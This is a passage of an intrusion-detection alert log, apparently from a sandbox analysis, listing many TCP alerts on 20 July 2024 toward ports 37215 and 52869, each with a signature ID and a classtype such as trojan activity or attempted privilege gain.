                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2829579
                      Source Port:41888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.601040
                      SID:2027339
                      Source Port:57016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.641942
                      SID:2831300
                      Source Port:56544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.206268
                      SID:2025132
                      Source Port:53034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.322405
                      SID:2027339
                      Source Port:49484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2829579
                      Source Port:50494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.441271
                      SID:2025132
                      Source Port:46226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.647694
                      SID:2829579
                      Source Port:59862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.310207
                      SID:2835222
                      Source Port:41020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.130270
                      SID:2027339
                      Source Port:51168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2835222
                      Source Port:55018
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333070
                      SID:2831300
                      Source Port:37974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.075219
                      SID:2835222
                      Source Port:41722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.180913
                      SID:2027339
                      Source Port:54438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.102525
                      SID:2025132
                      Source Port:36072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2835222
                      Source Port:34088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.791090
                      SID:2027339
                      Source Port:47260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2835222
                      Source Port:39666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322110
                      SID:2831300
                      Source Port:44766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.374418
                      SID:2027339
                      Source Port:58308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.992284
                      SID:2027339
                      Source Port:47644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.304416
                      SID:2025132
                      Source Port:37654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2835222
                      Source Port:44788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2829579
                      Source Port:50264
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.724924
                      SID:2027339
                      Source Port:50284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2829579
                      Source Port:43594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222207
                      SID:2829579
                      Source Port:39796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.365539
                      SID:2027339
                      Source Port:50400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2835222
                      Source Port:35672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.945747
                      SID:2027339
                      Source Port:44964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.482793
                      SID:2027339
                      Source Port:42058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2829579
                      Source Port:39240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2829579
                      Source Port:36712
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.560530
                      SID:2027339
                      Source Port:49680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.187124
                      SID:2027339
                      Source Port:36010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.415663
                      SID:2831300
                      Source Port:42988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.064169
                      SID:2831300
                      Source Port:52738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.874808
                      SID:2831300
                      Source Port:38898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.094111
                      SID:2025132
                      Source Port:48356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.672944
                      SID:2831300
                      Source Port:60846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.980169
                      SID:2025132
                      Source Port:47834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.327539
                      SID:2027339
                      Source Port:37754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.841232
                      SID:2027339
                      Source Port:57342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.798234
                      SID:2027339
                      Source Port:53904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.544188
                      SID:2025132
                      Source Port:33672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2829579
                      Source Port:47446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.161610
                      SID:2025132
                      Source Port:60168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.219817
                      SID:2027339
                      Source Port:34482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.165469
                      SID:2027339
                      Source Port:58744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2829579
                      Source Port:48414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.265254
                      SID:2831300
                      Source Port:33578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2835222
                      Source Port:46440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.093784
                      SID:2027339
                      Source Port:49082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.571884
                      SID:2027339
                      Source Port:47098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.160906
                      SID:2025132
                      Source Port:34986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2829579
                      Source Port:56342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.159872
                      SID:2831300
                      Source Port:47696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2835222
                      Source Port:48120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:36.102280
                      SID:2831300
                      Source Port:46296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.938491
                      SID:2027339
                      Source Port:41506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.389908
                      SID:2025132
                      Source Port:58454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.064169
                      SID:2831300
                      Source Port:43312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.807611
                      SID:2027339
                      Source Port:49242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2835222
                      Source Port:59268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2829579
                      Source Port:35010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2829579
                      Source Port:55246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.684499
                      SID:2027339
                      Source Port:44404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.567841
                      SID:2831300
                      Source Port:46500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2835222
                      Source Port:33566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.902509
                      SID:2831300
                      Source Port:44290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.944379
                      SID:2027339
                      Source Port:57812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2829579
                      Source Port:44054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.567841
                      SID:2027339
                      Source Port:53186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.048889
                      SID:2027339
                      Source Port:53344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.308516
                      SID:2027339
                      Source Port:54942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.883172
                      SID:2835222
                      Source Port:50806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.666677
                      SID:2027339
                      Source Port:44326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.246802
                      SID:2027339
                      Source Port:50224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.047601
                      SID:2025132
                      Source Port:42960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.778817
                      SID:2831300
                      Source Port:46836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2829579
                      Source Port:34896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.349095
                      SID:2025132
                      Source Port:34796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.519802
                      SID:2831300
                      Source Port:40966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2835222
                      Source Port:46650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.311710
                      SID:2025132
                      Source Port:46826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.280308
                      SID:2831300
                      Source Port:42914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2835222
                      Source Port:38176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2829579
                      Source Port:49182
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.604426
                      SID:2027339
                      Source Port:48060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.543362
                      SID:2831300
                      Source Port:51336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.422228
                      SID:2025132
                      Source Port:57522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.889163
                      SID:2829579
                      Source Port:55552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2835222
                      Source Port:41200
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.930422
                      SID:2025132
                      Source Port:55040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2835222
                      Source Port:53678
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.134490
                      SID:2027339
                      Source Port:57054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.275716
                      SID:2027339
                      Source Port:54548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.154068
                      SID:2829579
                      Source Port:52500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2835222
                      Source Port:50680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.378726
                      SID:2025132
                      Source Port:40432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.563729
                      SID:2027339
                      Source Port:59400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.937814
                      SID:2835222
                      Source Port:42512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.928503
                      SID:2025132
                      Source Port:59858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.020186
                      SID:2025132
                      Source Port:40860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.874054
                      SID:2027339
                      Source Port:37088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633744
                      SID:2835222
                      Source Port:59806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2829579
                      Source Port:47310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.571946
                      SID:2831300
                      Source Port:56214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.120876
                      SID:2027339
                      Source Port:55384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.575986
                      SID:2027339
                      Source Port:34640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314906
                      SID:2027339
                      Source Port:57430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222279
                      SID:2829579
                      Source Port:58602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2829579
                      Source Port:42374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2835222
                      Source Port:43812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.724924
                      SID:2831300
                      Source Port:50284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2829579
                      Source Port:39904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.462339
                      SID:2027339
                      Source Port:41534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.367078
                      SID:2027339
                      Source Port:48042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2829579
                      Source Port:42646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2829579
                      Source Port:58050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2835222
                      Source Port:45458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.489343
                      SID:2027339
                      Source Port:46452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.275864
                      SID:2027339
                      Source Port:34734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.309955
                      SID:2027339
                      Source Port:41650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2835222
                      Source Port:42402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.755930
                      SID:2025132
                      Source Port:44056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.022763
                      SID:2835222
                      Source Port:50798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.388926
                      SID:2831300
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2829579
                      Source Port:60950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.659435
                      SID:2027339
                      Source Port:51832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220983
                      SID:2835222
                      Source Port:55530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.898615
                      SID:2027339
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.522990
                      SID:2025132
                      Source Port:53746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2829579
                      Source Port:42496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2835222
                      Source Port:46358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.065822
                      SID:2027339
                      Source Port:49282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2835222
                      Source Port:33174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.325400
                      SID:2027339
                      Source Port:54428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2829579
                      Source Port:38558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2835222
                      Source Port:38676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2829579
                      Source Port:33218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286911
                      SID:2027339
                      Source Port:56910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.862542
                      SID:2027339
                      Source Port:44990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.279669
                      SID:2835222
                      Source Port:43798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2829579
                      Source Port:48890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.002144
                      SID:2027339
                      Source Port:41796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.146350
                      SID:2831300
                      Source Port:47110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.428503
                      SID:2027339
                      Source Port:33086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.035756
                      SID:2027339
                      Source Port:38810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2829579
                      Source Port:48096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.280821
                      SID:2027339
                      Source Port:50254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.175701
                      SID:2027339
                      Source Port:38730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.142086
                      SID:2027339
                      Source Port:57262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.175511
                      SID:2831300
                      Source Port:52488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.818842
                      SID:2829579
                      Source Port:35052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2835222
                      Source Port:37886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.716646
                      SID:2025132
                      Source Port:46338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.977046
                      SID:2025132
                      Source Port:50968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2835222
                      Source Port:42554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.503890
                      SID:2027339
                      Source Port:44896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2829579
                      Source Port:40132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2835222
                      Source Port:47376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.802130
                      SID:2025132
                      Source Port:49964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.933452
                      SID:2027339
                      Source Port:51032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.648489
                      SID:2835222
                      Source Port:54854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.456456
                      SID:2025132
                      Source Port:51624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.428221
                      SID:2027339
                      Source Port:55450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2835222
                      Source Port:58066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.630327
                      SID:2831300
                      Source Port:34078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.282996
                      SID:2027339
                      Source Port:57500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2829579
                      Source Port:56196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2829579
                      Source Port:48390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044417
                      SID:2829579
                      Source Port:41170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.054762
                      SID:2027339
                      Source Port:32944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.463722
                      SID:2025132
                      Source Port:46604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.303421
                      SID:2025132
                      Source Port:50492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.621955
                      SID:2831300
                      Source Port:59324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2829579
                      Source Port:44902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.608320
                      SID:2831300
                      Source Port:38496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.582295
                      SID:2027339
                      Source Port:35552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2835222
